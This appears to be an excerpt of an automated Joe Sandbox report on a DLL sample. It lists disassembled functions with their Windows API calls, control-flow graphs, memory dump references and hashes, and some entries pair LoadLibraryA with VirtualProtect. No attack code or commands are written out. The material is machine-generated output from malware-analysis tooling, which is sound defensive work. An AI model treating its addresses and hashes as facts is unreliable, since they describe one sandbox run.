                                          • GlobalLock.KERNEL32(00000000), ref: 6FACBD11
                                          • _memset.LIBCMT ref: 6FACBD2B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBD59
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: 56f7a3c0ea6f5ab774657c34ba9b7c6cd7b3e0546934bcdd1aec7718a8485a61
                                          • Instruction ID: 8d8d44e3cf842c6d596a73e3932a5d1cf5f7b3a300800734ce79a93c7ff8aa8c
                                          • Opcode Fuzzy Hash: 56f7a3c0ea6f5ab774657c34ba9b7c6cd7b3e0546934bcdd1aec7718a8485a61
                                          • Instruction Fuzzy Hash: 4231E371A04B04AFDB21CF78C889A9ABBF9FF45350B048A2DE656D7240DB35F881CB50
                                          Function 6FAC64E0 Relevance: 4.7, APIs: 3, Instructions: 151librarymemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 77 6fac64e0-6fac64e8 78 6fac64ea-6fac6501 77->78 78->78 79 6fac6503-6fac6513 78->79 80 6fac6515-6fac6522 79->80 81 6fac6526-6fac6551 79->81 80->81 82 6fac6557-6fac6568 81->82 83 6fac65f1 81->83 85 6fac656c-6fac6577 82->85 84 6fac65f3-6fac6661 LoadLibraryA VirtualProtect call 6fac67f8 VirtualProtect 83->84 92 6fac6682-6fac66a9 84->92 93 6fac6663 84->93 87 6fac6579 85->87 88 6fac65da 85->88 91 6fac657b-6fac6580 87->91 89 6fac65dc-6fac65e0 88->89 95 6fac6704-6fac6716 89->95 96 6fac65e6-6fac65eb 89->96 91->91 94 6fac6582-6fac6584 91->94 97 6fac6667-6fac6680 93->97 94->88 98 6fac6586-6fac658c 94->98 95->84 96->83 96->85 97->92 97->97 100 6fac66fa 98->100 101 6fac6592-6fac659c 98->101 100->95 102 6fac65a0-6fac65b7 101->102 102->102 103 6fac65b9-6fac65ca 102->103 103->89 104 6fac65cc-6fac65d8 103->104 104->89
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FAC6602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FAC663B
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: 9a1febfd6ea76f4081b3002436ed59b0327407ef718da4da156a27041151096d
                                          • Instruction ID: 73bfb78963a9750de7f3e90f7d289b6123713927c3ab737f3bde1a09aee95953
                                          • Opcode Fuzzy Hash: 9a1febfd6ea76f4081b3002436ed59b0327407ef718da4da156a27041151096d
                                          • Instruction Fuzzy Hash: DA51F5705083558FC715CF29C9C062AFBE5BFCA308F19895DE88957316C634F956CB92
                                          Function 6FAC6750 Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 191 6fac6750-6fac6762 ReadFile 193 6fac630a-6fac6323 191->193 194 6fac61f0-6fac6207 191->194 195 6fac634d-6fac6368 193->195 196 6fac6325-6fac6329 193->196 199 6fac636a 195->199 200 6fac63cb 195->200 197 6fac632f 196->197 198 6fac6738 196->198 202 6fac6331-6fac633c 197->202 198->191 203 6fac636c-6fac6372 199->203 204 6fac63cd-6fac63ee 200->204 202->202 206 6fac633e-6fac6347 202->206 203->203 207 6fac6374-6fac6376 203->207 205 6fac66dc 204->205 205->198 206->195 208 6fac6349 206->208 207->200 209 6fac6378-6fac637e 207->209 208->195 209->205 210 6fac6384-6fac638d 209->210 211 6fac6391-6fac63a8 210->211 211->211 212 6fac63aa-6fac63ba 211->212 212->204 213 6fac63bc-6fac63c9 212->213 213->204
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FAEC168), ref: 6FAC6300
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: adfd71b60288a64a59ee0e6c064eadf589119a9c256312ec088764e798b61536
                                          • Instruction ID: 756358e04eb4e5302a8fb0437cdd6da6286153e45ac5bf89f65af874932792fd
                                          • Opcode Fuzzy Hash: adfd71b60288a64a59ee0e6c064eadf589119a9c256312ec088764e798b61536
                                          • Instruction Fuzzy Hash: BF41C2756087058FC708CF19C88067AB7E2FFC6324F09CA6DE88997315D635F8968B82
                                          Function 6FAC62D0 Relevance: 1.6, APIs: 1, Instructions: 97fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 214 6fac62d0-6fac62d5 215 6fac62db-6fac62e0 214->215 216 6fac6742-6fac674e 214->216 217 6fac626d-6fac627b 215->217 218 6fac62e2-6fac62f1 215->218 220 6fac627d 217->220 221 6fac62cf 217->221 222 6fac62f3-6fac6304 ReadFile 218->222 223 6fac627f-6fac6284 220->223 224 6fac62d1-6fac62d5 221->224 226 6fac630a-6fac6323 222->226 227 6fac61f0-6fac6207 222->227 223->223 225 6fac6286-6fac6288 223->225 224->215 224->216 225->221 230 6fac628a-6fac6290 225->230 228 6fac634d-6fac6368 226->228 229 6fac6325-6fac6329 226->229 233 6fac636a 228->233 234 6fac63cb 228->234 231 6fac632f 229->231 232 6fac6738-6fac6762 229->232 235 6fac6296-6fac629a 230->235 236 6fac66d2 230->236 238 6fac6331-6fac633c 231->238 232->222 239 6fac636c-6fac6372 233->239 241 6fac63cd-6fac63ee 234->241 240 6fac629c-6fac62b2 235->240 236->216 238->238 243 6fac633e-6fac6347 238->243 239->239 245 6fac6374-6fac6376 239->245 240->240 246 6fac62b4-6fac62c1 240->246 242 6fac66dc 241->242 242->232 243->228 247 6fac6349 243->247 245->234 248 6fac6378-6fac637e 245->248 246->224 249 6fac62c3-6fac62cd 246->249 247->228 248->242 250 6fac6384-6fac638d 248->250 249->224 251 6fac6391-6fac63a8 250->251 251->251 252 6fac63aa-6fac63ba 251->252 252->241 253 6fac63bc-6fac63c9 252->253 253->241
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FAEC168), ref: 6FAC6300
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b4f8e12a3597656d376c3a6f1ce11c0e1411473cae7c128879a73119b5060542
                                          • Instruction ID: 996b865f9dc4bd8dbb326a6a4627df08dc231a9244f65e1c2a8b8c48527f689f
                                          • Opcode Fuzzy Hash: b4f8e12a3597656d376c3a6f1ce11c0e1411473cae7c128879a73119b5060542
                                          • Instruction Fuzzy Hash: ED31BF71A087058FC719CF19C88067AB7E2BFC6314F09C96DE89957316D634F896CB82
                                          Function 6FACC050 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 254 6facc050-6facc068 call 6fad50c9 257 6facc06f-6facc072 254->257 258 6facc06a call 6fac6dc1 254->258 260 6facc0aa-6facc0bb call 6facba5b 257->260 261 6facc074-6facc07c 257->261 258->257 269 6facc0bd-6facc0cb call 6facbe0d 260->269 270 6facc0d0-6facc0d7 call 6fad51a1 260->270 263 6facc07e-6facc09d call 6facbd66 261->263 264 6facc09f call 6facbc4e 261->264 263->258 263->264 268 6facc0a4-6facc0a8 264->268 268->258 268->260 269->270
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FACC057
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 50c96c825f12d8adda17828d79b8e503235327abd4e98051895eddd9583ba2b6
                                          • Instruction ID: 3c61af2c77438bb58d0f6d7cc15fad224105b3475ff481dbf262e9ac7fdc8b57
                                          • Opcode Fuzzy Hash: 50c96c825f12d8adda17828d79b8e503235327abd4e98051895eddd9583ba2b6
                                          • Instruction Fuzzy Hash: ED015A34601B428BDB19AF68851126D36A2AF513A4F158529E891CF2D0DF39D9C28B12
                                          Function 6FAC60F0 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 6fac60f0-6fac6139 CreateFileW 277 6fac61de-6fac6780 276->277 278 6fac613f-6fac67e4 276->278 285 6fac5eba-6fac5f0c GlobalAlloc 278->285 286 6fac5e23-6fac5e3c 278->286 287 6fac5fad 285->287 288 6fac5f12-6fac5f2b 285->288 289 6fac5e40-6fac5e4e 286->289 290 6fac5faf-6fac5fce 287->290 291 6fac5f2f-6fac5f3d 288->291 292 6fac5e50 289->292 293 6fac5ea3 289->293 302 6fac5fe7-6fac5fea 290->302 303 6fac5fd0 290->303 296 6fac5f3f 291->296 297 6fac5f92 291->297 298 6fac5e52-6fac5e58 292->298 299 6fac5ea5-6fac5ea9 293->299 304 6fac5f41-6fac5f47 296->304 306 6fac5f94-6fac5f98 297->306 298->298 305 6fac5e5a-6fac5e5c 298->305 300 6fac5eaf-6fac5eb4 299->300 301 6fac67c3-6fac67d8 299->301 300->289 307 6fac5eb6 300->307 309 6fac5fec 302->309 310 6fac5ffe-6fac6038 302->310 308 6fac5fd2-6fac5fe5 303->308 304->304 311 6fac5f49-6fac5f4b 304->311 305->293 312 6fac5e5e-6fac5e64 305->312 314 6fac5f9e-6fac5fa3 306->314 315 6fac67a5-6fac67be 306->315 307->285 308->302 308->308 317 6fac5fee-6fac5ffc 309->317 318 6fac603e-6fac6057 310->318 319 6fac60d9 310->319 311->297 320 6fac5f4d-6fac5f53 311->320 321 6fac66aa-6fac66af 312->321 322 6fac5e6a-6fac5e6e 312->322 314->291 316 6fac5fa5-6fac5fa9 314->316 315->290 316->287 317->310 317->317 325 6fac605b-6fac6069 318->325 323 6fac60db-6fac60ef 319->323 326 6fac5f59-6fac5f5d 320->326 327 6fac66b4 320->327 324 6fac5e90-6fac5e95 321->324 328 6fac5e70-6fac5e86 322->328 324->299 333 6fac5e97-6fac5ea1 324->333 329 6fac60be 325->329 330 6fac606b 325->330 331 6fac5f5f-6fac5f75 326->331 335 6fac66be 327->335 328->328 332 6fac5e88-6fac5e8c 328->332 334 6fac60c0-6fac60c4 329->334 336 6fac606d-6fac6073 330->336 331->331 337 6fac5f77-6fac5f84 331->337 332->324 333->299 338 6fac6788-6fac67a0 334->338 339 6fac60ca-6fac60cf 334->339 335->338 336->336 340 6fac6075-6fac6077 336->340 337->306 341 6fac5f86-6fac5f90 337->341 338->323 339->325 342 6fac60d1-6fac60d5 339->342 340->329 343 6fac6079-6fac607f 340->343 341->306 342->319 343->335 344 6fac6085-6fac6089 343->344 345 6fac608b-6fac60a1 344->345 345->345 346 6fac60a3-6fac60b0 345->346 346->334 347 6fac60b2-6fac60bc 346->347 347->334
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FAC60F6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 0b61af444aa15cad42467f0e943137376c08e339d91ec6979204ae6abd83bb0b
                                          • Instruction ID: bfacf9a97a2ece001b6d87b7480bddc2d460aaaf3fc36822d6ffb2a1e0d8254f
                                          • Opcode Fuzzy Hash: 0b61af444aa15cad42467f0e943137376c08e339d91ec6979204ae6abd83bb0b
                                          • Instruction Fuzzy Hash: B101E8B49097019FC718CF0AC89091AFBE6FFC9314F16856DA8489B316C630E851CF85
                                          Function 6FADA6F4 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 348 6fada6f4-6fada716 HeapCreate 349 6fada718-6fada719 348->349 350 6fada71a-6fada723 348->350
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FAD4776,00000001,?,?,?,6FAD48EF,?,?,?,6FAEE848,0000000C,6FAD49AA), ref: 6FADA709
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 6f58cc66efddac0bc666d29b3e27ee937a7ffb46c92fdf83c24c2ec59407d681
                                          • Instruction ID: de9ca8bc8c85986a30e03f2da93dc75865fb9d54c5eb2d0003c8ca3858e4defd
                                          • Opcode Fuzzy Hash: 6f58cc66efddac0bc666d29b3e27ee937a7ffb46c92fdf83c24c2ec59407d681
                                          • Instruction Fuzzy Hash: 29D05E32A587449EDB009E76AC087663BED97857A6F14C835F80DCB180F574D5A19A04

                                          Non-executed Functions

                                          Function 6FAC748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FAC7498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FAC76D5,?,00000000,?,00000000,00000104,00000000,?,6FAEBEF4,00000000), ref: 6FAC74D6
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FAC7546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FAC756D
                                          • CharUpperW.USER32(00000000), ref: 6FAC75A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6FAC75BC
                                          • FindClose.KERNEL32(00000000), ref: 6FAC75C8
                                          • lstrlenW.KERNEL32(?), ref: 6FAC75E6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 3cc44be4aee977a8e1e7cdbe9f02cbade29c0293f40a3de7da4ab52774dc8b43
                                          • Instruction ID: f751f36e03f3100d25fdfc83d3db5a7d467f29d617ef74ae2816a8ba34e89340
                                          • Opcode Fuzzy Hash: 3cc44be4aee977a8e1e7cdbe9f02cbade29c0293f40a3de7da4ab52774dc8b43
                                          • Instruction Fuzzy Hash: 3D41B2709087199BDF14AF74CE9CBAE7B7CAF01314F0442D9E829A1190DB399AD5CF12
                                          Function 6FAD2932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          • Opcode ID: 0e651dc843ef306eb2629499ed7067551a2c1efcb3e7dc23a187473dac80fd48
                                          • Instruction ID: b845dd972536aca32d57dfc17dcf6e9db5298345b20f14b9652d099f2d479c44
                                          • Opcode Fuzzy Hash: 0e651dc843ef306eb2629499ed7067551a2c1efcb3e7dc23a187473dac80fd48
                                          • Instruction Fuzzy Hash: 21910171D0030DAEEB51CFA4C585BDEBBF8AF48348F149166FD18E6184E7B89685C7A0
                                          Function 6FAD3F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6FAD7C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FAD7C81
                                          • UnhandledExceptionFilter.KERNEL32(6FAEA4B8), ref: 6FAD7C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FAD7CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6FAD7CAF
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: eb11f81e53a338767bf00455fa5afad2c4a0ab5a6f1bcfd226865bcba0ab34d2
                                          • Instruction ID: 0deef2a0632589c6ae22d976b68dabcbde89d13312c34b33abc68e90803e4e5b
                                          • Opcode Fuzzy Hash: eb11f81e53a338767bf00455fa5afad2c4a0ab5a6f1bcfd226865bcba0ab34d2
                                          • Instruction Fuzzy Hash: D521CFB4807B04AFDB40DF6DE9496493BB4BB0A325F51C21AE408DF390E7B4A5A29B45
                                          Function 6FAC89B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FAC89FC
                                          • __snwprintf_s.LIBCMT ref: 6FAC8A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6FAC8A69
                                            • Part of subcall function 6FAD5348: __getptd_noexit.LIBCMT ref: 6FAD5348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          • Opcode ID: 8d3878b58ba24444b773108f19cf877f5b26bc99ee452faa11b1f74f38eeb701
                                          • Instruction ID: 38c809853de0e7788e5f3d1481e9ee4b2c4a33cd3617d04de4dc5c98305e2e6c
                                          • Opcode Fuzzy Hash: 8d3878b58ba24444b773108f19cf877f5b26bc99ee452faa11b1f74f38eeb701
                                          • Instruction Fuzzy Hash: BD11B471A65308AFDB10AB78CD54BAE77ACFF01358F050065F114AB0D0DB7C9AC59762
                                          Function 6FACE5F6 Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FACE61F
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 6FACE634
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$CallNtdllProcProc_
                                          • String ID:
                                          • API String ID: 1646280189-0
                                          • Opcode ID: 01b5b9a2450f0ced291192c639c1b75b097ce15e08009edb7e386919163e412a
                                          • Instruction ID: 663566874e8ce53496c8001c6988bc4d9c7da9d15ec26b4d04153fde43734ccc
                                          • Opcode Fuzzy Hash: 01b5b9a2450f0ced291192c639c1b75b097ce15e08009edb7e386919163e412a
                                          • Instruction Fuzzy Hash: FFF01C36114305FFCF114FA4CC44DDABBB9FF19761B088468FA9986520D732E860EB40
                                          Function 6FAD0D95 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c65e6a72fcecf6bbf0fa2e7035b00b09c43ed5957c9ae3691a597f98aa00020
                                          • Instruction ID: 9e4b10a40868b42463b2619551c2a3238e85f61d1b69f47e14a1817a7266c5dc
                                          • Opcode Fuzzy Hash: 0c65e6a72fcecf6bbf0fa2e7035b00b09c43ed5957c9ae3691a597f98aa00020
                                          • Instruction Fuzzy Hash: 0EF0A03244522DFBCF025EA58E00DCB3B29EF0D761F04D012FA9465054C339E6A1EBA5
                                          Function 6FAC8BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FAC8BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FAC8EB7,?,?), ref: 6FAC8C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FAC8C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FAC8C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FAC8CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FAC8CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FAC8CFE
